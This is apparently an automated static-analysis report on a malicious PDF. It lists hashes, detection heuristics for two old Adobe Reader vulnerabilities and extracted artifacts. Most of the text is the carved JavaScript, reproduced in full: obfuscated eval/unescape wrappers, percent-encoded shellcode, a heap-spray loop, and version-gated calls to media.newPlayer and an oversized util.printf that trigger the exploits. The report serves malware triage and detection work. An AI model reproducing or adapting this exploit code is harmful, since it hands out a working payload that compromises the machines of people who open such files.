Malicious PDF — malware analysis report

Static analysis result for SHA-256 e83a2b658f404731…

MALICIOUS

PDF

7.1 KB First seen: 2026-05-11
MD5: caf3ff27a9688097cf13906c117513ef SHA-1: f7272c7fff39532dbf2af9b82b7768ba49533899 SHA-256: e83a2b658f404731e314a8646e258d17a383ac474564c3d5f6ccd36ad2a93c3d
268 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 7

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (matched in decompressed stream)
  • util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992
    PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (matched in decompressed stream)
  • Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KIT
    One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0006_000.js pdf-javascript-stream PDF /JS object 6 at offset 0x167 6603 bytes
SHA-256: 8693bc5f6481ecab86832c853b54a5ae110306f474ba543a0accc706d54efc6c
Preview script
First 1,000 lines of the extracted script
xxxxx='ev';yyyyy='al';zzzzz=xxxxx+yyyyy;aaaaa=app;try {} catch(e) 
{zzzzz=1;aaaaa=1;}try {d=nothis_nothis;zzzzz=1;aaaaa=1;} catch(e) {}aaaaa[zzzzz]('ddddd'+'dd=une'+'sca'/**/+/**/'pe;');try {adsfadsf=e2e2;ddddddd=1;} catch(e) {}dxdxdx=aaaaa[zzzzz];this.zoom = this.zoom*1;var XfNKZYaDMuRytwWNugvrjSeZgxKFsrmOIQgdenL = ddddddd(ddddddd("%25u4141%25ue841%25u0001%25u0000%25u8b00%25u240c%25uc483%25u8d04%25u1249%25u8041%25u6731%25u3980%25u7590%25u0df7%25u0f76%25ucbaf%25u6767%25uaf0f%25u67fb%25u0f67%25u7767%25u6767%25u470f%25u67d0%25u0f67%25ucbbe%25u6767%25u670d%25u9e0f%25u6604%25u3367%25u0f9b%25u55f4%25uf383%25ua30f%25u78ea%25u0f13%25u51d5%25u7468%25u300f%25u6a01%25u0f98%25u4836%25u66c5%25u5e0f%25u1a85%25u0fe4%25u95e8%25u067f%25u240f%25ucbd9%25u0fbc%25uc88a%25ud398%25uce0f%25ufe45%25u0fc6%25u74e9%25ucb6d%25ufc0f%25uece0%25uec82%25uea93%25ub719%25ubc54%25u63d0%25u844c%25u5433%25u03b5%25u3dec%25uec57%25u6b2c%25u2eec%25uec7b%25uec6e%25u6f0e%25u5aca%25u55f4%25uf383%25u6712%25uec07%25u5b22%25u2bec%25u1f62%25uaa64%25u3eec%25u6447%25u54ba%25u2098%25u53ec%25u64dc%25ufe92%25ud968%25u5d61%25u13a3%25ua66f%25u60ad%25ub764%25u8c21%25u5c96%25u4333%25u127b%25uec83%25u433e%25uba64%25uec01%25u1c5b%25u3eec%25u647b%25u64ba%25udc4b%25u38f2%25u30cc%25u5a06%25u55f4%25uf383%25uc912%25u8be6%25u6f67%25u6767%25u8bec%25u20ec%25ue49b%25u62a7%25u20ee%25uec9b%25u8b20%25ua7e4%25uee62%25u8b20%25u670d%25u3098%25u54b7%25u54ae%25ue7bc%25u5d5f%25u6612%25u2624%25u5be7%25u5d6f%25u9e12%25ue424%25u659c%25u9412%25u642e%25ueea6%25u67e2%25u6766%25u5467%25u26ae%25u5be7%25u456f%25u9e12%25u63a1%25u676f%25u670d%25ue70f%25u6767%25u0d67%25u0d64%25u0d67%25u0f64%25u6767%25ue767%25ud2ec%25u6667%25u6767%25u8f31%25u6767%25u6767%25ue43f%25u6aa7%25u3237%25u8bec%25u20ec%25u989b%25uee87%25u5320%25u0f32%25u6667%25u6767%25u3098%25uea8f%25u67d2%25u6766%25u3167%25u670d%25u670d%25u9832%25ubf30%25u670d%25u670d%25u650d%25u670d%25u670d%25u670f%25u6767%25u3127%25u678f%25u6767%25u3f67%25ua7e4%25u376a%25uec32%25uec8b%25u9b20%25u8798%25u9fe4%25u6867%25u0be9%25u6765%25uee67%25u67e2%25u6761%25uec67%25u2338%25u10ec%25u0d53%25u0d67%25u3467%25u9831%25u8730%25u38ec%25ua02f%25u63e2%25u6761%25u6767%25u6763%25u0d67%25uea67%25u67e2%25u6760%25u3767%25u670f%25u6763%25uea67%25u67e2%25u6765%25u3767%25u10ec%25u3153%25u3098%25uec93%25u4aa4%25u6367%25u6767%25u9fe4%25u1867%25uee61%25u63fa%25u6761%25u5467%25ueaae%25u6ad3%25u6567%25u6767%25u55cb%25ua7a6%25u64af%25u9de0%25udbea%25u676a%25u6765%25ucd67%25u9de0%25u5c26%25u63ea%25u6761%25u1267%25u0db9%25uea67%25u63e2%25u6760%25u3767%25ud298%25u6163%25u6767%25ue2ea%25u6567%25u6767%25u9837%25u67d2%25u6761%25u9867%25u9f30%25u8ce6%25u6367%25u6767%25u9ce4%25u1867%25u98e3%25u67d2%25u6761%25u9867%25u9730%25u670d%25ud2ea%25u6667%25u6767%25u8f31%25u6767%25u6767%25ue43f%25u6aa7%25u3237%25u8bec%25u20ec%25u988b%25u0d87%25u0d67%25u9867%25u2b10%25u1098%25u9853%25u8730%25u670d%25ue2ea%25u6067%25u6767%25u9837%25u3710%25ue2ea%25u6667%25u6767%25u9837%25u5310%25u3098%25u5493%25u27a7%25u1be7%25u6762%25u1267%25uec9f%25u3728%25u9ce0%25u1bea%25u6762%25ud2ea%25u6667%25u6767%25uc394%25u9ce0%25u670d%25u670d%25u650d%25u670d%25u670d%25u670f%25u6767%25u3227%25u678f%25u6767%25u3f67%25ua7e4%25u376a%25uec32%25uec8b%25u9b20%25u8798%25u9fe4%25u6867%25u5be9%25u6766%25uee67%25u67e2%25u6761%25uec67%25u5b38%25u10ec%25u0d53%25u0d67%25u3467%25u9831%25u8730%25u38ec%25ua027%25u63e2%25u6761%25u6767%25u6763%25u0d67%25uea67%25u67e2%25u6760%25u3767%25u670f%25u6763%25uea67%25u67e2%25u6765%25u3767%25u9831%25u9330%25ua4ec%25u674a%25u6763%25ue467%25u679f%25u6118%25ufaee%25u6163%25u6767%25u670d%25ue2ea%25u6063%25u6767%25u9837%25u63d2%25u6761%25uea67%25u67e2%25u6765%25u3767%25ud298%25u6167%25u6767%25u3098%25ue69f%25u678c%25u6763%25ue467%25u679c%25ucc18%25ud298%25u6167%25u6767%25u3098%25uea97%25u67d2%25u6766%25u0f67%25u6667%25u6767%25u0d31%25u9867%25ubb30%25ue2a1%25u6798%25u6767%25u5445%25u26ae%25udbe7%25u676a%25u6766%25u6767%25u9212%25ue3a0%25u676a%25u6766%25u4567%25u4847%25ue414%25u63a6%25ua001%25u6ae3%25u6667%25u6767%25u4547%25ua6e4%25ue065%25u549c%25ueab5%25u7213%25ucb67%25udbea%25u676a%25u6766%25ucd67%25u2526%25u675b%25u8a12%25ua12e%25u6ae3%25u6667%25u6767%25ua045%25u8ce2%25u6767%25u2467%25u232a%25ua049%25u88e2%25u6767%25u2267%25u223f%25u0147%25ue2a0%25u6794%25u6767%25u0448%25ue2a1%25u6792%25u6767%25ua047%25u91e2%25u6767%25u1367%25u1406%25ua00c%25u9de2%25u6767%25u0b67%25u140e%25ua113%25u99e2%25u6767%25u4167%25u9ce0%25ue2ea%25u678c%25u6767%25u670d%25u8f37%25u6767%25u6767%25ue43f%25u6aa7%25u3237%25u8bec%25u20ec%25u988b%25u0d87%25u0d67%25u9898%25u8330%25uf7f7%25uf7f7%25uf7f7%25u00f7%25u0000"));
var IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp = ddddddd("%"+/**/"u0"+/**/"a0a"+/**/"%"+/**/"u"+/**/"0a"+/**/"0a");
var wuRSxZHUiWoYofmfrKJJDnOwVoSHXUmDReDAn = ddddddd(ddddddd("%25u0a0a%25u0a0a%25u0a0a%25u0a0a%25u0a0a%25u0a0a%25u0a0a%25u0a0a%25u4478%25u4a75%25u6457%25u6865%25u5846%25u496b%25u4d6b%25u4373%25u6756%25u5a58%25u575a%25u7856%25u4b54%25u5858%25u6543%25u7474%25u7273%25u4153%25u4b4e%25u6e70%25u516f%25u4345%25u7870%25u624c%25u7456%25u6e72%25u4743%25u4b4d"));
this.zoom = this.zoom*1;lenlen = (0x400000/2);while(IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp.length <= lenlen) IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp+=IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp;
dxdxdx("IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp=IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp.subst"+/********************/"ring(0,32768 - XfNKZYaDMuRytwWNugvrjSeZgxKFsrmOIQgdenL.length);");muuuuu=new Array();this.zoom = this.zoom*1;lenlenlen=0x700;
for(i=0;i<lenlenlen;i++) {muuuuu[i]= IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp + XfNKZYaDMuRytwWNugvrjSeZgxKFsrmOIQgdenL;}util.printd("zhFvZPRxwrcXQJVFALoWckjIlrYaLBnwVTJw", new Date());
var version = app.viewerVersion.toString();
if(version>=8.0)
{
util.printd("UcDiTDslmSOGyIAvnrigdAPgAfIGJkTqHqZt", new Date());
var xxx=ddddddd("this.%20%20%20me"+/**/"dia.%20%20%20new"+/**/"Play"+/**/"er%28nu"+/**/"ll%29%3B");
try {dxdxdx(xxx);} catch(e) {}
util.printd(wuRSxZHUiWoYofmfrKJJDnOwVoSHXUmDReDAn, new Date());
}
if(version>=7.0 && version<8)
{
	var la = '12999999999999999999';
	for(ii=0;ii<276;ii++)
		la += '8';
	var yyy=ddddddd("util.%20%20%20pr"+/**/"%69%6etf"+/**/"%28%22%25"+/**/"%34%35%30%30%30%66"+/**/"%22%2C%6c%61%29%3B");
	try{dxdxdx(yyy)} catch(e){}
}
javascript_obj0006_001.js pdf-javascript-stream PDF /JS object 6 at offset 0x18A 6827 bytes
SHA-256: 8737a2c8523da449cb38bcfbfdc9b506f3c1a6ef78a61eb0fcc12a60f4e626db
Preview script
First 1,000 lines of the extracted script
xxxxx='ev';yyyyy='al';zzzzz=xxxxx+yyyyy;aaaaa=app;try {} catch(e) 
{zzzzz=1;aaaaa=1;}try {d=nothis_nothis;zzzzz=1;aaaaa=1;} catch(e) {}aaaaa[zzzzz]('ddddd'+'dd=une'+'sca'/**/+/**/'pe;');try {adsfadsf=e2e2;ddddddd=1;} catch(e) {}dxdxdx=aaaaa[zzzzz];this.zoom = this.zoom*1;var XfNKZYaDMuRytwWNugvrjSeZgxKFsrmOIQgdenL = ddddddd(ddddddd("%25u4141%25ue841%25u0001%25u0000%25u8b00%25u240c%25uc483%25u8d04%25u1249%25u8041%25u6731%25u3980%25u7590%25u0df7%25u0f76%25ucbaf%25u6767%25uaf0f%25u67fb%25u0f67%25u7767%25u6767%25u470f%25u67d0%25u0f67%25ucbbe%25u6767%25u670d%25u9e0f%25u6604%25u3367%25u0f9b%25u55f4%25uf383%25ua30f%25u78ea%25u0f13%25u51d5%25u7468%25u300f%25u6a01%25u0f98%25u4836%25u66c5%25u5e0f%25u1a85%25u0fe4%25u95e8%25u067f%25u240f%25ucbd9%25u0fbc%25uc88a%25ud398%25uce0f%25ufe45%25u0fc6%25u74e9%25ucb6d%25ufc0f%25uece0%25uec82%25uea93%25ub719%25ubc54%25u63d0%25u844c%25u5433%25u03b5%25u3dec%25uec57%25u6b2c%25u2eec%25uec7b%25uec6e%25u6f0e%25u5aca%25u55f4%25uf383%25u6712%25uec07%25u5b22%25u2bec%25u1f62%25uaa64%25u3eec%25u6447%25u54ba%25u2098%25u53ec%25u64dc%25ufe92%25ud968%25u5d61%25u13a3%25ua66f%25u60ad%25ub764%25u8c21%25u5c96%25u4333%25u127b%25uec83%25u433e%25uba64%25uec01%25u1c5b%25u3eec%25u647b%25u64ba%25udc4b%25u38f2%25u30cc%25u5a06%25u55f4%25uf383%25uc912%25u8be6%25u6f67%25u6767%25u8bec%25u20ec%25ue49b%25u62a7%25u20ee%25uec9b%25u8b20%25ua7e4%25uee62%25u8b20%25u670d%25u3098%25u54b7%25u54ae%25ue7bc%25u5d5f%25u6612%25u2624%25u5be7%25u5d6f%25u9e12%25ue424%25u659c%25u9412%25u642e%25ueea6%25u67e2%25u6766%25u5467%25u26ae%25u5be7%25u456f%25u9e12%25u63a1%25u676f%25u670d%25ue70f%25u6767%25u0d67%25u0d64%25u0d67%25u0f64%25u6767%25ue767%25ud2ec%25u6667%25u6767%25u8f31%25u6767%25u6767%25ue43f%25u6aa7%25u3237%25u8bec%25u20ec%25u989b%25uee87%25u5320%25u0f32%25u6667%25u6767%25u3098%25uea8f%25u67d2%25u6766%25u3167%25u670d%25u670d%25u9832%25ubf30%25u670d%25u670d%25u650d%25u670d%25u670d%25u670f%25u6767%25u3127%25u678f%25u6767%25u3f67%25ua7e4%25u376a%25uec32%25uec8b%25u9b20%25u8798%25u9fe4%25u6867%25u0be9%25u6765%25uee67%25u67e2%25u6761%25uec67%25u2338%25u10ec%25u0d53%25u0d67%25u3467%25u9831%25u8730%25u38ec%25ua02f%25u63e2%25u6761%25u6767%25u6763%25u0d67%25uea67%25u67e2%25u6760%25u3767%25u670f%25u6763%25uea67%25u67e2%25u6765%25u3767%25u10ec%25u3153%25u3098%25uec93%25u4aa4%25u6367%25u6767%25u9fe4%25u1867%25uee61%25u63fa%25u6761%25u5467%25ueaae%25u6ad3%25u6567%25u6767%25u55cb%25ua7a6%25u64af%25u9de0%25udbea%25u676a%25u6765%25ucd67%25u9de0%25u5c26%25u63ea%25u6761%25u1267%25u0db9%25uea67%25u63e2%25u6760%25u3767%25ud298%25u6163%25u6767%25ue2ea%25u6567%25u6767%25u9837%25u67d2%25u6761%25u9867%25u9f30%25u8ce6%25u6367%25u6767%25u9ce4%25u1867%25u98e3%25u67d2%25u6761%25u9867%25u9730%25u670d%25ud2ea%25u6667%25u6767%25u8f31%25u6767%25u6767%25ue43f%25u6aa7%25u3237%25u8bec%25u20ec%25u988b%25u0d87%25u0d67%25u9867%25u2b10%25u1098%25u9853%25u8730%25u670d%25ue2ea%25u6067%25u6767%25u9837%25u3710%25ue2ea%25u6667%25u6767%25u9837%25u5310%25u3098%25u5493%25u27a7%25u1be7%25u6762%25u1267%25uec9f%25u3728%25u9ce0%25u1bea%25u6762%25ud2ea%25u6667%25u6767%25uc394%25u9ce0%25u670d%25u670d%25u650d%25u670d%25u670d%25u670f%25u6767%25u3227%25u678f%25u6767%25u3f67%25ua7e4%25u376a%25uec32%25uec8b%25u9b20%25u8798%25u9fe4%25u6867%25u5be9%25u6766%25uee67%25u67e2%25u6761%25uec67%25u5b38%25u10ec%25u0d53%25u0d67%25u3467%25u9831%25u8730%25u38ec%25ua027%25u63e2%25u6761%25u6767%25u6763%25u0d67%25uea67%25u67e2%25u6760%25u3767%25u670f%25u6763%25uea67%25u67e2%25u6765%25u3767%25u9831%25u9330%25ua4ec%25u674a%25u6763%25ue467%25u679f%25u6118%25ufaee%25u6163%25u6767%25u670d%25ue2ea%25u6063%25u6767%25u9837%25u63d2%25u6761%25uea67%25u67e2%25u6765%25u3767%25ud298%25u6167%25u6767%25u3098%25ue69f%25u678c%25u6763%25ue467%25u679c%25ucc18%25ud298%25u6167%25u6767%25u3098%25uea97%25u67d2%25u6766%25u0f67%25u6667%25u6767%25u0d31%25u9867%25ubb30%25ue2a1%25u6798%25u6767%25u5445%25u26ae%25udbe7%25u676a%25u6766%25u6767%25u9212%25ue3a0%25u676a%25u6766%25u4567%25u4847%25ue414%25u63a6%25ua001%25u6ae3%25u6667%25u6767%25u4547%25ua6e4%25ue065%25u549c%25ueab5%25u7213%25ucb67%25udbea%25u676a%25u6766%25ucd67%25u2526%25u675b%25u8a12%25ua12e%25u6ae3%25u6667%25u6767%25ua045%25u8ce2%25u6767%25u2467%25u232a%25ua049%25u88e2%25u6767%25u2267%25u223f%25u0147%25ue2a0%25u6794%25u6767%25u0448%25ue2a1%25u6792%25u6767%25ua047%25u91e2%25u6767%25u1367%25u1406%25ua00c%25u9de2%25u6767%25u0b67%25u140e%25ua113%25u99e2%25u6767%25u4167%25u9ce0%25ue2ea%25u678c%25u6767%25u670d%25u8f37%25u6767%25u6767%25ue43f%25u6aa7%25u3237%25u8bec%25u20ec%25u988b%25u0d87%25u0d67%25u9898%25u8330%25uf7f7%25uf7f7%25uf7f7%25u00f7%25u0000"));
var IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp = ddddddd("%"+/**/"u0"+/**/"a0a"+/**/"%"+/**/"u"+/**/"0a"+/**/"0a");
var wuRSxZHUiWoYofmfrKJJDnOwVoSHXUmDReDAn = ddddddd(ddddddd("%25u0a0a%25u0a0a%25u0a0a%25u0a0a%25u0a0a%25u0a0a%25u0a0a%25u0a0a%25u4478%25u4a75%25u6457%25u6865%25u5846%25u496b%25u4d6b%25u4373%25u6756%25u5a58%25u575a%25u7856%25u4b54%25u5858%25u6543%25u7474%25u7273%25u4153%25u4b4e%25u6e70%25u516f%25u4345%25u7870%25u624c%25u7456%25u6e72%25u4743%25u4b4d"));
this.zoom = this.zoom*1;lenlen = (0x400000/2);while(IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp.length <= lenlen) IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp+=IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp;
dxdxdx("IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp=IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp.subst"+/********************/"ring(0,32768 - XfNKZYaDMuRytwWNugvrjSeZgxKFsrmOIQgdenL.length);");muuuuu=new Array();this.zoom = this.zoom*1;lenlenlen=0x700;
for(i=0;i<lenlenlen;i++) {muuuuu[i]= IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp + XfNKZYaDMuRytwWNugvrjSeZgxKFsrmOIQgdenL;}util.printd("zhFvZPRxwrcXQJVFALoWckjIlrYaLBnwVTJw", new Date());
var version = app.viewerVersion.toString();
if(version>=8.0)
{
util.printd("UcDiTDslmSOGyIAvnrigdAPgAfIGJkTqHqZt", new Date());
var xxx=ddddddd("this.%20%20%20me"+/**/"dia.%20%20%20new"+/**/"Play"+/**/"er%28nu"+/**/"ll%29%3B");
try {dxdxdx(xxx);} catch(e) {}
util.printd(wuRSxZHUiWoYofmfrKJJDnOwVoSHXUmDReDAn, new Date());
}
if(version>=7.0 && version<8)
{
	var la = '12999999999999999999';
	for(ii=0;ii<276;ii++)
		la += '8';
	var yyy=ddddddd("util.%20%20%20pr"+/**/"%69%6etf"+/**/"%28%22%25"+/**/"%34%35%30%30%30%66"+/**/"%22%2C%6c%61%29%3B");
	try{dxdxdx(yyy)} catch(e){}
} 
endstream 
endobj xref
0 7
0000000000 65535 f 
0000000015 00000 n 
0000000100 00000 n 
0000000297 00000 n 
0000000148 00000 n 
0000000207 00000 n 
0000000359 00000 n 
trailer

<<
/Root 1 0 R
/Size 7
>>
startxref
7016
%%EOF
generic_stage_recovery_000.js deobfuscated-js generic stage recovery percent-decode from decompressed stream at 0x167 at offset 0x167 5129 bytes
SHA-256: 5f4ec2d05c783b74f76825c15277f2a22af53716d359071c6c3bd5815f29b55b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
xxxxx=ev;yyyyy=al;zzzzz=xxxxxyyyyy;aaaaa=app;try{}catch(e){zzzzz=1;aaaaa=1;}try{d=nothis_nothis;zzzzz=1;aaaaa=1;}catch(e){}aaaaa[zzzzz](ddddddd=unescape;);try{adsfadsf=e2e2;ddddddd=1;}catch(e){}dxdxdx=aaaaa[zzzzz];this.zoom=this.zoom*1;varXfNKZYaDMuRytwWNugvrjSeZgxKFsrmOIQgdenL=ddddddd(ddddddd(%u4141%ue841%u0001%u0000%u8b00%u240c%uc483%u8d04%u1249%u8041%u6731%u3980%u7590%u0df7%u0f76%ucbaf%u6767%uaf0f%u67fb%u0f67%u7767%u6767%u470f%u67d0%u0f67%ucbbe%u6767%u670d%u9e0f%u6604%u3367%u0f9b%u55f4%uf383%ua30f%u78ea%u0f13%u51d5%u7468%u300f%u6a01%u0f98%u4836%u66c5%u5e0f%u1a85%u0fe4%u95e8%u067f%u240f%ucbd9%u0fbc%uc88a%ud398%uce0f%ufe45%u0fc6%u74e9%ucb6d%ufc0f%uece0%uec82%uea93%ub719%ubc54%u63d0%u844c%u5433%u03b5%u3dec%uec57%u6b2c%u2eec%uec7b%uec6e%u6f0e%u5aca%u55f4%uf383%u6712%uec07%u5b22%u2bec%u1f62%uaa64%u3eec%u6447%u54ba%u2098%u53ec%u64dc%ufe92%ud968%u5d61%u13a3%ua66f%u60ad%ub764%u8c21%u5c96%u4333%u127b%uec83%u433e%uba64%uec01%u1c5b%u3eec%u647b%u64ba%udc4b%u38f2%u30cc%u5a06%u55f4%uf383%uc912%u8be6%u6f67%u6767%u8bec%u20ec%ue49b%u62a7%u20ee%uec9b%u8b20%ua7e4%uee62%u8b20%u670d%u3098%u54b7%u54ae%ue7bc%u5d5f%u6612%u2624%u5be7%u5d6f%u9e12%ue424%u659c%u9412%u642e%ueea6%u67e2%u6766%u5467%u26ae%u5be7%u456f%u9e12%u63a1%u676f%u670d%ue70f%u6767%u0d67%u0d64%u0d67%u0f64%u6767%ue767%ud2ec%u6667%u6767%u8f31%u6767%u6767%ue43f%u6aa7%u3237%u8bec%u20ec%u989b%uee87%u5320%u0f32%u6667%u6767%u3098%uea8f%u67d2%u6766%u3167%u670d%u670d%u9832%ubf30%u670d%u670d%u650d%u670d%u670d%u670f%u6767%u3127%u678f%u6767%u3f67%ua7e4%u376a%uec32%uec8b%u9b20%u8798%u9fe4%u6867%u0be9%u6765%uee67%u67e2%u6761%uec67%u2338%u10ec%u0d53%u0d67%u3467%u9831%u8730%u38ec%ua02f%u63e2%u6761%u6767%u6763%u0d67%uea67%u67e2%u6760%u3767%u670f%u6763%uea67%u67e2%u6765%u3767%u10ec%u3153%u3098%uec93%u4aa4%u6367%u6767%u9fe4%u1867%uee61%u63fa%u6761%u5467%ueaae%u6ad3%u6567%u6767%u55cb%ua7a6%u64af%u9de0%udbea%u676a%u6765%ucd67%u9de0%u5c26%u63ea%u6761%u1267%u0db9%uea67%u63e2%u6760%u3767%ud298%u6163%u6767%ue2ea%u6567%u6767%u9837%u67d2%u6761%u9867%u9f30%u8ce6%u6367%u6767%u9ce4%u1867%u98e3%u67d2%u6761%u9867%u9730%u670d%ud2ea%u6667%u6767%u8f31%u6767%u6767%ue43f%u6aa7%u3237%u8bec%u20ec%u988b%u0d87%u0d67%u9867%u2b10%u1098%u9853%u8730%u670d%ue2ea%u6067%u6767%u9837%u3710%ue2ea%u6667%u6767%u9837%u5310%u3098%u5493%u27a7%u1be7%u6762%u1267%uec9f%u3728%u9ce0%u1bea%u6762%ud2ea%u6667%u6767%uc394%u9ce0%u670d%u670d%u650d%u670d%u670d%u670f%u6767%u3227%u678f%u6767%u3f67%ua7e4%u376a%uec32%uec8b%u9b20%u8798%u9fe4%u6867%u5be9%u6766%uee67%u67e2%u6761%uec67%u5b38%u10ec%u0d53%u0d67%u3467%u9831%u8730%u38ec%ua027%u63e2%u6761%u6767%u6763%u0d67%uea67%u67e2%u6760%u3767%u670f%u6763%uea67%u67e2%u6765%u3767%u9831%u9330%ua4ec%u674a%u6763%ue467%u679f%u6118%ufaee%u6163%u6767%u670d%ue2ea%u6063%u6767%u9837%u63d2%u6761%uea67%u67e2%u6765%u3767%ud298%u6167%u6767%u3098%ue69f%u678c%u6763%ue467%u679c%ucc18%ud298%u6167%u6767%u3098%uea97%u67d2%u6766%u0f67%u6667%u6767%u0d31%u9867%ubb30%ue2a1%u6798%u6767%u5445%u26ae%udbe7%u676a%u6766%u6767%u9212%ue3a0%u676a%u6766%u4567%u4847%ue414%u63a6%ua001%u6ae3%u6667%u6767%u4547%ua6e4%ue065%u549c%ueab5%u7213%ucb67%udbea%u676a%u6766%ucd67%u2526%u675b%u8a12%ua12e%u6ae3%u6667%u6767%ua045%u8ce2%u6767%u2467%u232a%ua049%u88e2%u6767%u2267%u223f%u0147%ue2a0%u6794%u6767%u0448%ue2a1%u6792%u6767%ua047%u91e2%u6767%u1367%u1406%ua00c%u9de2%u6767%u0b67%u140e%ua113%u99e2%u6767%u4167%u9ce0%ue2ea%u678c%u6767%u670d%u8f37%u6767%u6767%ue43f%u6aa7%u3237%u8bec%u20ec%u988b%u0d87%u0d67%u9898%u8330%uf7f7%uf7f7%uf7f7%u00f7%u0000));varIfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp=ddddddd(%u0a0a%u0a0a);varwuRSxZHUiWoYofmfrKJJDnOwVoSHXUmDReDAn=ddddddd(ddddddd(%u0a0a%u0a0a%u0a0a%u0a0a%u0a0a%u0a0a%u0a0a%u0a0a%u4478%u4a75%u6457%u6865%u5846%u496b%u4d6b%u4373%u6756%u5a58%u575a%u7856%u4b54%u5858%u6543%u7474%u7273%u4153%u4b4e%u6e70%u516f%u4345%u7870%u624c%u7456%u6e72%u4743%u4b4d));this.zoom=this.zoom*1;lenlen=(0x400000/2);while(IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp.length<=lenlen)IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp=IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp;dxdxdx(IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp=IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlymp.substring(0,32768-XfNKZYaDMuRytwWNugvrjSeZgxKFsrmOIQgdenL.length););muuuuu=newArray();this.zoom=this.zoom*1;lenlenlen=0x700;for(i=0;i<lenlenlen;i){muuuuu[i]=IfgGfEZalFZytjctTpGSujEZetNezJlgGaTRlRgXSxfzTVNMBCHRjelBGpnodtrajzkoxqzwMVSBnQmIasPlympXfNKZYaDMuRytwWNugvrjSeZgxKFsrmOIQgdenL;}util.printd(zhFvZPRxwrcXQJVFALoWckjIlrYaLBnwVTJw,newDate());varversion=app.viewerVersion.toString();if(version>=8.0){util.printd(UcDiTDslmSOGyIAvnrigdAPgAfIGJkTqHqZt,newDate());varxxx=ddddddd(this.   media.   newPlayer(null););try{dxdxdx(xxx);}catch(e){}util.printd(wuRSxZHUiWoYofmfrKJJDnOwVoSHXUmDReDAn,newDate());}if(version>=7.0&&version<8){varla=12999999999999999999;for(ii=0;ii<276;ii)la=8;varyyy=ddddddd(util.   printf("E000f",la););try{dxdxdx(yyy)}catch(e){}}
